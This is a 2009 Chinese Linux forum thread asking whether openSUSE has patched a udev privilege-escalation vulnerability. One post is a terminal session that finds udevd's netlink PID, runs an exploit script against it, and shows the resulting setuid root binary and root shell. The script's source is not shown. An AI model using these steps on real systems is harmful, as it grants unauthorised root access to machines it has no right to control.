LinuxSir.cn,穿越时空的Linuxsir!

 找回密码
 注册
搜索
热搜: shell linux mysql
12
返回列表 发新帖
楼主: zpcat

udev 漏洞opensuse修复了吗?

[复制链接]
发表于 2009-4-28 06:19:12 | 显示全部楼层
Post by LinuxIsHard;1980393
这是啥漏洞?孤陋寡闻没听说过

Read this:

http://www.linuxsir.cn/bbs/thread349279.html
回复 支持 反对

使用道具 举报

发表于 2009-4-28 15:33:04 | 显示全部楼层
我在自己机上测试怎么没有成功呢?我的udev-128-9.7.1
jun@linux-q7ej:~> sh a 675
jun@linux-q7ej:~>
就这样,没什么变化,好像没有提权
回复 支持 反对

使用道具 举报

发表于 2009-4-28 19:03:18 | 显示全部楼层
这是极高危漏洞的说
  1. d00m3d@BlackMesa:/tmp$ /sbin/udevd --version
  2. 128
  3. d00m3d@BlackMesa:/tmp$ ll
  4. total 4
  5. -rw-rw-r-- 1 d00m3d d00m3d 3367 Apr 28 17:23 udev-exploit.sh
  6. d00m3d@BlackMesa:/tmp$ ps ax|grep udev
  7.   578 ?        S<s    0:00 /sbin/udevd --daemon
  8. 2147 pts/1    S+     0:00 grep udev
  9. d00m3d@BlackMesa:/tmp$ cat /proc/net/netlink
  10. sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks     Drops
  11. f7017200 0   0      00000000 0        0        (null) 2        0
  12. f70e0400 10  0      00000000 0        0        (null) 2        0
  13. f7137200 11  0      00000000 0        0        (null) 2        0
  14. f73eb400 15  577    00000001 0        0        (null) 2        0
  15. f703be00 15  0      00000000 0        0        (null) 2        0
  16. f70d1a00 16  0      00000000 0        0        (null) 2        0
  17. f70d1c00 18  0      00000000 0        0        (null) 2        0
  18. d00m3d@BlackMesa:/tmp$ sh ./udev-exploit.sh 577
  19. suid.c: In function 'main':
  20. suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
  21. cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
  22. \u@\h:\w$ whoami
  23. root
  24. \u@\h:\w$ id
  25. uid=0(root) gid=0(root) groups=12(video),15(cdrom),1000(d00m3d),1001(fuse),1002(nx)
  26. \u@\h:\w$ ls -l
  27. total 44
  28. -rwxrwxr-x 1 d00m3d d00m3d 2380 Apr 28 17:53 libno_ex.so.1.0
  29. -rw-rw-r-- 1 d00m3d d00m3d  232 Apr 28 17:53 program.c
  30. -rw-rw-r-- 1 d00m3d d00m3d 1360 Apr 28 17:53 program.o
  31. -rwsrwsr-x 1 root   root   7172 Apr 28 17:53 suid
  32. -rw-rw-r-- 1 d00m3d d00m3d   80 Apr 28 17:53 suid.c
  33. -rwxrwxr-x 1 d00m3d d00m3d 8792 Apr 28 17:53 udev
  34. -rw-rw-r-- 1 d00m3d d00m3d 3367 Apr 28 17:23 udev-exploit.sh
  35. -rw-rw-r-- 1 d00m3d d00m3d 2216 Apr 28 17:53 udev.c
  36. \u@\h:\w$ groups
  37. root video cdrom d00m3d fuse nx
  38. \u@\h:\w$
复制代码
回复 支持 反对

使用道具 举报

 楼主| 发表于 2009-4-28 19:09:15 | 显示全部楼层
看来,现在suse还没有修复这个漏洞啊!
回复 支持 反对

使用道具 举报

发表于 2009-4-28 19:21:12 | 显示全部楼层
不好意思,我只想指出问题,以上的测试不是在 SuSE 进行的,如有误导,敬请见谅!
回复 支持 反对

使用道具 举报

发表于 2009-5-4 15:59:33 | 显示全部楼层
141了,没办法测试了

并且没办法运行sh a ,提示:
$sh a xxx
sh: a: 没有那个文件或目录
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表